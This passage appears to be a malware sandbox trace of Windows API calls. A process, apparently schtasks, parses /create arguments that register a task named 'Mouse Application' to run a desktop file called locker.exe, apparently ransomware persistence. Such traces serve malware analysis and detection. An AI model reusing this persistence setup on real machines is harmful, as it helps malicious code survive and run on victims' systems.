2 [0113.489] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.489] lstrlenW (lpString="TN") returned 2 [0113.489] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.489] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|tn|") returned 4 [0113.489] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.489] lstrlenW (lpString="|tn|") returned 4 [0113.489] lstrlenW (lpString="|TN|") returned 4 [0113.489] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] lstrlenW (lpString="Mouse Application") returned 17 [0113.489] lstrlenW (lpString="-/") returned 2 [0113.489] StrChrIW (lpStart="-/", wMatch=0x32f004d) returned 0x0 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] lstrlenW (lpString="Mouse Application") returned 17 [0113.489] StrChrIW (lpStart="Mouse Application", wMatch=0x3a) returned 0x0 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] lstrlenW (lpString="Mouse Application") returned 17 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] lstrlenW (lpString="/TR") returned 3 [0113.489] lstrlenW (lpString="-/") returned 2 [0113.489] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.489] lstrlenW (lpString="create") returned 6 [0113.490] lstrlenW (lpString="create") returned 6 [0113.490] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.490] lstrlenW (lpString="TR") returned 2 [0113.490] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.490] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|create|") returned 8 [0113.490] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.490] lstrlenW (lpString="|create|") returned 8 [0113.490] lstrlenW (lpString="|TR|") returned 4 [0113.490] StrStrIW (lpFirst="|create|", lpSrch="|TR|") returned 0x0 [0113.490] RtlRestoreLastWin32Error () returned 0x3163000 [0113.490] lstrlenW (lpString="?") returned 1 [0113.490] lstrlenW (lpString="?") returned 1 [0113.490] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.490] lstrlenW (lpString="TR") returned 2 [0113.490] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.490] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|?|") returned 3 [0113.490] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.490] lstrlenW (lpString="|?|") returned 3 [0113.490] lstrlenW (lpString="|TR|") returned 4 [0113.490] RtlRestoreLastWin32Error () returned 0x3163000 [0113.490] lstrlenW (lpString="s") returned 1 [0113.490] lstrlenW (lpString="s") returned 1 [0113.490] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.490] lstrlenW (lpString="TR") returned 2 [0113.490] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.490] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|s|") returned 3 [0113.490] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.490] lstrlenW (lpString="|s|") returned 3 [0113.490] lstrlenW (lpString="|TR|") returned 4 [0113.490] RtlRestoreLastWin32Error () returned 0x3163000 [0113.490] lstrlenW (lpString="u") returned 1 [0113.490] lstrlenW (lpString="u") returned 1 [0113.490] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.490] lstrlenW (lpString="TR") returned 2 [0113.491] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.491] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|u|") returned 3 [0113.491] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.491] lstrlenW (lpString="|u|") returned 3 [0113.491] lstrlenW (lpString="|TR|") returned 4 [0113.491] RtlRestoreLastWin32Error () returned 0x3163000 [0113.491] lstrlenW (lpString="p") returned 1 [0113.491] lstrlenW (lpString="p") returned 1 [0113.491] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.491] lstrlenW (lpString="TR") returned 2 [0113.491] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.491] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|p|") returned 3 [0113.491] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.491] lstrlenW (lpString="|p|") returned 3 [0113.491] lstrlenW (lpString="|TR|") returned 4 [0113.491] RtlRestoreLastWin32Error () returned 0x3163000 [0113.491] lstrlenW (lpString="ru") returned 2 [0113.491] lstrlenW (lpString="ru") returned 2 [0113.491] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.491] lstrlenW (lpString="TR") returned 2 [0113.491] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.491] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|ru|") returned 4 [0113.491] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.491] lstrlenW (lpString="|ru|") returned 4 [0113.491] lstrlenW (lpString="|TR|") returned 4 [0113.491] StrStrIW (lpFirst="|ru|", lpSrch="|TR|") returned 0x0 [0113.491] RtlRestoreLastWin32Error () returned 0x3163000 [0113.491] lstrlenW (lpString="rp") returned 2 [0113.491] lstrlenW (lpString="rp") returned 2 [0113.491] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.492] lstrlenW (lpString="TR") returned 2 [0113.492] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.492] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|rp|") returned 4 [0113.492] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.492] lstrlenW (lpString="|rp|") returned 4 [0113.492] lstrlenW (lpString="|TR|") returned 4 [0113.492] StrStrIW (lpFirst="|rp|", lpSrch="|TR|") returned 0x0 [0113.492] RtlRestoreLastWin32Error () returned 0x3163000 [0113.492] lstrlenW (lpString="sc") returned 2 [0113.492] lstrlenW (lpString="sc") returned 2 [0113.492] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.492] lstrlenW (lpString="TR") returned 2 [0113.492] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.492] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|sc|") returned 4 [0113.492] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.492] lstrlenW (lpString="|sc|") returned 4 [0113.492] lstrlenW (lpString="|TR|") returned 4 [0113.492] StrStrIW (lpFirst="|sc|", lpSrch="|TR|") returned 0x0 [0113.492] RtlRestoreLastWin32Error () returned 0x3163000 [0113.492] lstrlenW (lpString="mo") returned 2 [0113.492] lstrlenW (lpString="mo") returned 2 [0113.492] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.492] lstrlenW (lpString="TR") returned 2 [0113.492] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.492] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|mo|") returned 4 [0113.492] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.492] lstrlenW (lpString="|mo|") returned 4 [0113.492] lstrlenW (lpString="|TR|") returned 4 [0113.492] StrStrIW (lpFirst="|mo|", lpSrch="|TR|") returned 0x0 [0113.492] RtlRestoreLastWin32Error () returned 0x3163000 [0113.492] lstrlenW (lpString="d") returned 1 [0113.492] lstrlenW (lpString="d") returned 1 [0113.493] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.493] lstrlenW (lpString="TR") returned 2 [0113.493] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.493] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|d|") returned 3 [0113.493] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.493] lstrlenW (lpString="|d|") returned 3 [0113.493] lstrlenW (lpString="|TR|") returned 4 [0113.493] RtlRestoreLastWin32Error () returned 0x3163000 [0113.493] lstrlenW (lpString="m") returned 1 [0113.493] lstrlenW (lpString="m") returned 1 [0113.493] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.493] lstrlenW (lpString="TR") returned 2 [0113.493] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.493] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|m|") returned 3 [0113.493] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.493] lstrlenW (lpString="|m|") returned 3 [0113.493] lstrlenW (lpString="|TR|") returned 4 [0113.493] RtlRestoreLastWin32Error () returned 0x3163000 [0113.493] lstrlenW (lpString="i") returned 1 [0113.493] lstrlenW (lpString="i") returned 1 [0113.493] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.493] lstrlenW (lpString="TR") returned 2 [0113.493] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.493] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|i|") returned 3 [0113.493] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.493] lstrlenW (lpString="|i|") returned 3 [0113.493] lstrlenW (lpString="|TR|") returned 4 [0113.493] RtlRestoreLastWin32Error () returned 0x3163000 [0113.493] lstrlenW (lpString="tn") returned 2 [0113.493] lstrlenW (lpString="tn") returned 2 [0113.493] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.493] lstrlenW (lpString="TR") returned 2 [0113.493] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.494] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|tn|") returned 4 [0113.494] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.494] lstrlenW (lpString="|tn|") returned 4 [0113.494] lstrlenW (lpString="|TR|") returned 4 [0113.494] StrStrIW (lpFirst="|tn|", lpSrch="|TR|") returned 0x0 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] lstrlenW (lpString="tr") returned 2 [0113.494] lstrlenW (lpString="tr") returned 2 [0113.494] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.494] lstrlenW (lpString="TR") returned 2 [0113.494] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.494] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|tr|") returned 4 [0113.494] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TR|") returned 4 [0113.494] lstrlenW (lpString="|tr|") returned 4 [0113.494] lstrlenW (lpString="|TR|") returned 4 [0113.494] StrStrIW (lpFirst="|tr|", lpSrch="|TR|") returned="|tr|" [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.494] lstrlenW (lpString="-/") returned 2 [0113.494] StrChrIW (lpStart="-/", wMatch=0x32f0043) returned 0x0 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.494] StrChrIW (lpStart="C:\\Users\\FD1HVy\\Desktop\\locker.exe", wMatch=0x3a) returned=":\\Users\\FD1HVy\\Desktop\\locker.exe" [0113.494] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.494] _memicmp (_Buf1=0x330fcd8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.494] _memicmp (_Buf1=0x330fa20, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] lstrlenW (lpString="C") returned 1 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.494] RtlRestoreLastWin32Error () returned 0x3163000 [0113.495] _memicmp (_Buf1=0x330fc30, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.495] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.495] GetProcessHeap () returned 0x3300000 [0113.495] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330fcf0) returned 1 [0113.495] GetProcessHeap () returned 0x3300000 [0113.495] RtlReAllocateHeap (Heap=0x3300000, Flags=0xc, Ptr=0x330fcf0, Size=0x46) returned 0x3304208 [0113.495] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.495] lstrlenW (lpString=" \x09") returned 2 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x79) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0113.495] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0113.496] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0113.496] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0113.496] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0113.496] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0113.496] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0113.496] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0113.496] GetLastError () returned 0x0 [0113.496] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.496] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 34 [0113.496] RtlRestoreLastWin32Error () returned 0x3163000 [0113.496] RtlRestoreLastWin32Error () returned 0x3163000 [0113.496] lstrlenW (lpString="/f") returned 2 [0113.496] lstrlenW (lpString="-/") returned 2 [0113.496] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.496] lstrlenW (lpString="create") returned 6 [0113.496] lstrlenW (lpString="create") returned 6 [0113.496] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.496] lstrlenW (lpString="f") returned 1 [0113.496] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.496] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|create|") returned 8 [0113.496] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.496] lstrlenW (lpString="|create|") returned 8 [0113.496] lstrlenW (lpString="|f|") returned 3 [0113.496] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0 [0113.496] RtlRestoreLastWin32Error () returned 0x3163000 [0113.496] lstrlenW (lpString="?") returned 1 [0113.496] lstrlenW (lpString="?") returned 1 [0113.496] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.496] lstrlenW (lpString="f") returned 1 [0113.496] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.496] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|?|") returned 3 [0113.496] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.496] lstrlenW (lpString="|?|") returned 3 [0113.496] lstrlenW (lpString="|f|") returned 3 [0113.496] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0 [0113.497] RtlRestoreLastWin32Error () returned 0x3163000 [0113.497] lstrlenW (lpString="s") returned 1 [0113.497] lstrlenW (lpString="s") returned 1 [0113.497] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.497] lstrlenW (lpString="f") returned 1 [0113.497] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.497] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|s|") returned 3 [0113.497] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.497] lstrlenW (lpString="|s|") returned 3 [0113.497] lstrlenW (lpString="|f|") returned 3 [0113.497] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0 [0113.497] RtlRestoreLastWin32Error () returned 0x3163000 [0113.497] lstrlenW (lpString="u") returned 1 [0113.497] lstrlenW (lpString="u") returned 1 [0113.497] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.497] lstrlenW (lpString="f") returned 1 [0113.497] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.497] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|u|") returned 3 [0113.497] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.497] lstrlenW (lpString="|u|") returned 3 [0113.497] lstrlenW (lpString="|f|") returned 3 [0113.497] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0 [0113.497] RtlRestoreLastWin32Error () returned 0x3163000 [0113.497] lstrlenW (lpString="p") returned 1 [0113.497] lstrlenW (lpString="p") returned 1 [0113.497] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.497] lstrlenW (lpString="f") returned 1 [0113.497] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.497] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|p|") returned 3 [0113.497] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.497] lstrlenW (lpString="|p|") returned 3 [0113.497] lstrlenW (lpString="|f|") returned 3 [0113.497] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0 [0113.497] RtlRestoreLastWin32Error () returned 0x3163000 [0113.498] lstrlenW (lpString="ru") returned 2 [0113.498] lstrlenW (lpString="ru") returned 2 [0113.498] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.498] lstrlenW (lpString="f") returned 1 [0113.498] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.498] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|ru|") returned 4 [0113.498] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.498] lstrlenW (lpString="|ru|") returned 4 [0113.498] lstrlenW (lpString="|f|") returned 3 [0113.498] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0 [0113.498] RtlRestoreLastWin32Error () returned 0x3163000 [0113.498] lstrlenW (lpString="rp") returned 2 [0113.498] lstrlenW (lpString="rp") returned 2 [0113.498] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.498] lstrlenW (lpString="f") returned 1 [0113.498] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.498] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|rp|") returned 4 [0113.498] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.498] lstrlenW (lpString="|rp|") returned 4 [0113.498] lstrlenW (lpString="|f|") returned 3 [0113.498] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0 [0113.498] RtlRestoreLastWin32Error () returned 0x3163000 [0113.498] lstrlenW (lpString="sc") returned 2 [0113.498] lstrlenW (lpString="sc") returned 2 [0113.498] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.498] lstrlenW (lpString="f") returned 1 [0113.498] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.498] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|sc|") returned 4 [0113.498] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.498] lstrlenW (lpString="|sc|") returned 4 [0113.498] lstrlenW (lpString="|f|") returned 3 [0113.498] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0 [0113.498] RtlRestoreLastWin32Error () returned 0x3163000 [0113.499] lstrlenW (lpString="mo") returned 2 [0113.499] lstrlenW (lpString="mo") returned 2 [0113.499] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.499] lstrlenW (lpString="f") returned 1 [0113.499] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.499] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|mo|") returned 4 [0113.499] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.499] lstrlenW (lpString="|mo|") returned 4 [0113.499] lstrlenW (lpString="|f|") returned 3 [0113.499] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0 [0113.499] RtlRestoreLastWin32Error () returned 0x3163000 [0113.499] lstrlenW (lpString="d") returned 1 [0113.499] lstrlenW (lpString="d") returned 1 [0113.499] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.499] lstrlenW (lpString="f") returned 1 [0113.499] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.499] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|d|") returned 3 [0113.499] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.499] lstrlenW (lpString="|d|") returned 3 [0113.499] lstrlenW (lpString="|f|") returned 3 [0113.499] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0 [0113.499] RtlRestoreLastWin32Error () returned 0x3163000 [0113.499] lstrlenW (lpString="m") returned 1 [0113.499] lstrlenW (lpString="m") returned 1 [0113.499] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.499] lstrlenW (lpString="f") returned 1 [0113.499] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.499] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|m|") returned 3 [0113.499] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|f|") returned 3 [0113.499] lstrlenW (lpString="|m|") returned 3 [0113.499] lstrlenW (lpString="|f|") returned 3 [0113.499] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0 [0113.500] RtlRestoreLastWin32Error () returned 0x3163000 [0113.500] lstrlenW (lpString="i") returned 1 [0113.500] lstrlenW (lpString="i") returned 1 [0113.500] _memicmp 